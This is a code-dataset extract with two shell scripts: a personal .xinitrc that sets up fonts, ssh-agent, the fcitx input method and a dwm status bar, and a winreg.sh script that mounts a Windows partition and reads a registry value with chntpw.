db748fe363c7ad4ba3a74ae00a254fc0406a4980 | Shell | wangwangwar/bakfile | /.xinitrc | UTF-8 | 1,882 | 2.796875 | 3 | [] | no_license | #!/bin/bash
# Taken from:
# https://raw.github.com/kaihendry/Kai-s--HOME/master/.xinitrc
#
# for terminus font in Archlinux :(
xset +fp /usr/share/fonts/TTF
xset +fp /usr/share/fonts/wenquanyi/wqy-microhei
xset fp rehash
xset -b # disable bell
# Start ssh-agent and pre-load keys via the graphical askpass helper,
# trying the Archlinux path first and then the Debian path.
eval `/usr/bin/ssh-agent`
if test -f /usr/lib/openssh/x11-ssh-askpass # Archlinux
then
SSH_ASKPASS=/usr/lib/openssh/x11-ssh-askpass ssh-add < /dev/null
fi
if test -f /usr/lib/ssh/x11-ssh-askpass # Debian
then
SSH_ASKPASS=/usr/lib/ssh/x11-ssh-askpass ssh-add < /dev/null
fi
# 1280x720 = 720p X220
# Take a timestamped webcam snapshot in the background, if fswebcam exists.
hash fswebcam && fswebcam -q --no-banner -r 1280x720 ~/private/login-photos/$(date +%Y-%m-%dT%H).jpg &
xrdb -merge $HOME/.Xresources
xmodmap ~/.Xmodmap
#setxkbmap -layout gb -option ctrl:nocaps
# input
# Chinese input method: fcitx (the ibus alternative is kept commented out).
X_ENV="dwm"
export LANG=zh_CN.UTF-8
#export LC_ALL="zh_CN.UTF-8"
#export XIM=ibus
#export XIM_PROGRAM="ibus-daemon"
export GTK_IM_MODULE=fcitx
export QT_IM_MODULE=fcitx
export XMODIFIERS="@im=fcitx"
#export XIM_ARGS="--daemonize --xim"
fcitx -r
# ibus
#export GTK_IM_MODULE=ibus
#export QT_IM_MODULE=ibus
#export XIM=fcitx
#export XIM_PROGRAM=fcitx
#export XMODIFIERS=@im=ibus
#ibus-daemon -x -d
#while true
#do
#	VOL=$(amixer get Master | tail -1 | sed 's/.*\[\([0-9]*%\)\].*/\1/')
#	LOCALTIME=$(date +%Z\=%Y-%m-%dT%H:%M)
#	IP=$(for i in `ip r`; do echo $i; done | grep -A 1 src | tail -n1) # can get confused if you use vmware
#	TEMP="$(($(cat /sys/class/thermal/thermal_zone0/temp) / 1000))C"
#
#	if acpi -a | grep off-line > /dev/null
#	then
#	BAT="Bat. $(acpi -b | awk '{ print $4 " " $5 }' | tr -d ',')"
#	xsetroot -name "$IP $BAT $VOL $TEMP $LOCALTIME"
#	else
#	xsetroot -name "$IP $VOL $TEMP $LOCALTIME"
#	fi
#	sleep 20s
#done &
# Simple status bar: clock in the root window name, refreshed by a
# background loop, plus conky output piped into xsetroot.
while true
do
LOCALTIME=$(date +%Z\=%m-%dT%H:%M)
xsetroot -name "$LOCALTIME"
sleep 20s
done &
conky | while read -r; do xsetroot -name "$REPLY"; done &
exec dwm
#exec awesome
| true |
fe7103b0a74145aeea063a3f8b91ce1f5999ae84 | Shell | sweshelo/winreg | /winreg.sh | UTF-8 | 1,082 | 3.640625 | 4 | [] | no_license | #!/bin/bash
function getSystemDrive () {
  # Mount each partition of disk $1 in turn until one containing a
  # Windows registry (Windows/System32/config/SYSTEM) is found.
  # Returns the partition number (e.g. 3 for /dev/sda3) via the exit
  # status, or 0 if no Windows system partition exists on the disk.
  umount /mnt/Windows
  disk=$1
  # Search C Drive: candidate partitions are the device name followed by
  # a single digit in the fdisk listing.
  part=(`fdisk -l "${disk}" | grep -o "${disk}[0-9]"`)
  targ=""
  for d in "${part[@]}"; do
    # Create the mount point if it does not exist yet.
    # BUG FIX: the original tested the misspelled path "/mnt/Widnwos"
    # and had the condition inverted (mkdir only when the directory
    # existed), so the mount point was effectively never created.
    if [ ! -d "/mnt/Windows" ]; then
      mkdir /mnt/Windows
    fi
    ntfs-3g "$d" /mnt/Windows
    if [ -e "/mnt/Windows/Windows/System32/config/SYSTEM" ]; then
      ls /mnt/Windows
      targ=$d
    fi
    if [ -n "$targ" ]; then
      # Found it - leave the partition mounted for the caller.
      break
    else
      umount /mnt/Windows
    fi
  done
  if [ -n "$targ" ]; then
    return `echo $targ|grep -o '[0-9]'`
  fi
  return 0
}
# Get Machine Name
function getRegistryValue () {
# Dump registry key $2 from hive $1 (e.g. SYSTEM, SOFTWARE) of the
# Windows partition mounted at /mnt/Windows, using chntpw driven by
# expect, and echo the extracted value.
KEYTYPE=$1
KEYNAME=$2
# The expect program below is a double-quoted string sent verbatim;
# do not add comments or reindent inside it.
expect -c "
spawn env LANG=C /usr/sbin/chntpw -e /mnt/Windows/Windows/System32/config/${KEYTYPE}
set timeout 2
expect \"^> \"
send \"cat ${KEYNAME}\n\"
expect \"$\"
exit 0
" > /var/log/reg.log & wait
# Drop lines of 0-2 characters (prompt noise) and keep the last line,
# which holds the value printed by chntpw.
name=`cat /var/log/reg.log | sed -e '/^.\{0,2\}$/d'|tail -n 1`
echo $name
}
| true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.